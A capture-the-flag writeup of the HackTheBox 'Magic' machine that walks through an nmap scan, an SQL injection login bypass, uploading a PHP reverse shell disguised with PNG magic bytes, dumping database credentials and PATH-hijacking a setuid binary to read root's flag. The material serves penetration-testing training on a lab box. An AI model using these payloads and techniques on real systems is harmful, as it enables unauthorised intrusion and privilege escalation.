Categories
HackTheBox Writeups

[HTB] – Magic

Hello again ! Today I'm doing the writeup of Magic, a medium Linux box released on April 18th 2020 on HackTheBox.

If you have VIP access on the website, you can access it here : https://www.hackthebox.eu/home/machines/profile/241

Recon

As usual, I'm using nmap to scan for an entry point

nmap -A -p- -T4 10.10.10.176

I am using basic options as usual :

  • -A : enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
  • -p- : nmap scans every port
  • -T4 : allows you to adjust the Timing Template (according to your bandwidth, and the speed you're seeking)

I got the following results :

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-21 10:27 CEST
Nmap scan report for 10.10.10.185
Host is up (0.14s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/21%OT=22%CT=1%CU=33683%PV=Y%DS=2%DC=T%G=Y%TM=5E9EAF3
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   349.03 ms 10.10.14.1
2   349.02 ms 10.10.10.185

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 213.48 seconds

We notice an Http server running on port 80 with http-title being Magic Portfolio. Not the first portfolio we had on a HackTheBox machine, and I'm already thinking about malicious file upload.

Let's navigate to the website and take a look

10.10.10.185:80

First Access

To perform a malicious file upload, and maybe get a reverse-shell, I obviously need a way to upload my file. The inscription in the bottom left corner says :

By clicking Login I get a connection form, on which I try some basic SQL injections. The first that worked was ' or ''=', but you're welcome to find others 🙂

We are then asked to upload a file. How nice, thank you !

I am going to use a well known PHP reverse shell, but you can choose another one, or even build your own (it's actually not that hard if you're wondering). Link is: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

A filter is preventing us from uploading a php file. I tried the basic method of putting .png at the end of the file's name, but it wasn't enough to fool the filter. It seems to be checking the file's header. So what we need to do, is change this header to match the PNG signature.

To do this I retrieved the PNG signature (you can get a list of signatures here https://en.wikipedia.org/wiki/List_of_file_signatures). I then used a tool called bless, that is basically a hexadecimal editor, to remove the first 8 bytes and replace them with

89 50 4E 47 0D 0A 1A 0A.

Our file is ready for upload. If everything went the way it should have, you should get the following message :

(Maybe slightly different depending on the filename you choose 😉 )

The final step of getting access is running our malicious code on the remote server. ( I love this sentence, makes very HackerFilmLike don't you think ? 🙂 )

I used dirbuster to locate the folder where uploaded "images" are stored. I ran

sudo nc -lvp 443

port 443 being the one I entered in my PHP file (do remember to create a TCP redirection to your computer on this port).

http://10.10.10.185/images/uploads/reverseLogs.php.png

And we got a shell !

Own User

After some enumeration, I found a db.php5 file, that clearly refers to Database.

It mentions credentials, and a database name. Let's try to see if there is a dump of that database :

mysqldump Magic -u theseus --password=iamkingtheseus -X

This gives us a XML formated version of the sql script used to load the database at the state it was when is was dumped.




        
                
                
                
                
                
                
        
        
        
                1
                admin
                Th3s3usW4sK1ng
        
        


Here is our password Th3s3usW4sK1ng

Now that we have credentials, we can use the su command to login as theseus. This only works if we have a terminal. To get one, use the following command :

/usr/bin/script -qc /bin/bash /dev/null

Now just su theseus with Th3s3usW4sK1ng password.

We got user !

And we're done for the user part

Own Root

To work on a proper terminal, I can first add my SSH key to the ~/.ssh/authorized_keys file, to allow us to ssh into the machine with theseus's profile.

On my machine, I generate a set of ssh keys :

Next step is to copy the content of my ~/.ssh/id_rsa.pub into the authorized_keys of the remote machine.

[email protected]:~/.ssh$ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDJnXvUI5MJjKZ6C+nMi06aaZh8JHkwW9nFmkfH8sVEizTHryfhtFLfWK7Djp/5WBQ7cH2WmGR3xBswr++CbKw5XYi0OefhuJIViVa5CiElJehjRsOLLKBN9wOqnDh5WmgQWoq3HjpxIvrd41qxoAm38xb6aJPd1rc7yRNeZXH9G8Qmpo1npQ0XYdwgWLe/Ah+wb3NoQt4Zfmj1jdA42EyXgj69vYmeyQII3dWvj3kbTzcBc6VJvKu9R3F91dfNrZeJDzizolj5olfKvKEwHB2Z1N/b0YsnPp5s7onmnTkZvvPxUEWlHMqqtc8kUt25bvg+hsHrFpSZK/13SlPqe+xzmqfdMT3eeP6wXejl+QPXuSD236DrTPBA60FRSBnaMtJuOxI+bmoHJL2TKSnsmryZvfuOcVsEGRtsewMxKjPzF2oGUlQw938DHe/FRsl1IzgysdKdFzhlHlYkgAC7zZrNfjbDMU+RDgMS+Lrxd7ltlkhZ7uyfXnSVfbFwUgUrsGgWJv4yIDJRnd5+mRfBpP4xn5zEe8y387KSbc1r+AMY3RgVowXYR09BTtd3Wby5vxyzHX4zc0F5M0wbSVmbCZidxIDWZaFIsDX8GHCcgXL8Cqf8NWD32dyhbszLG9X+QPQKNreoos7TJnG75Z8qIhq2JjXHAkviV9gamnvwu7ax5Q== [email protected] >> authorized_keys

Make sure to use >> instead of > to avoid destroying other's work in progress (it adds the key to the file, without wiping its content).

Done, we now have proper access to the machine as theseus

ssh -i id_rsa [email protected]

I use /usr/bin/script -qc /bin/bash /dev/null again to get coloration on the terminal. Not essential, but it sure is easier when using enumeration scripts for example.

Speaking of which, let's upload linPeas.sh and run it

┌─|Log_s [18:17] :~ 
└──╼ $ scp linPeas.sh [email protected]:/tmp
linPeas.sh                                                         100%  157KB 140.9KB/s   00:01
[email protected]:/tmp$ chmod +x linPeas.sh
[email protected]:/tmp$ ./linPeas.sh > scan.txt

I noticed a file with setuid, that's not usually there in /bin :

Indeed sysinfo isn't a usual file. When running it, I discover lots of information about the system. After digging further and some enumeration by hand, I made the connection between our sysinfo and /usr/bin/lshw. When being ran, this file displays a part of the sysinfo's.

A warning also pop's up

WARNING: you should run this program as super-user.

So sysinfo is probably calling this program with its super-user rights. If we could write our own lshw, we could do anything with root privileges on the system.

Let's right this file. We can do a simple echo 'echo flag :;cat /root/root.txt'>lshw.

Now let's save this file as /tmp/lshw, and give it the proper rights.

[email protected]:/tmp$ echo 'echo flag :;cat /root/root.txt' > lshw
echo 'echo flag :;cat /root/root.txt' > lshw
[email protected]:/tmp$ chmod 777 lshw

The last step before running the exploit, is to make sure /bin/sysinfo finds our script before it finds the real one. In order to do so, the PATH needs to reference /tmp before /usr/bin.

export PATH=/tmp:$PATH

This changes the PATH for the current session. We define the PATH's value to /tmp and add the original PATH's value with $PATH. This is essential in order for a large set of commands to still work. Remember that every entry in the PATH is separated by ":" . You can check it out yourself by running echo $PATH.

Run the exploit :

/bin/sysinfo

And we got the flag !

Leave a Reply

Your email address will not be published. Required fields are marked *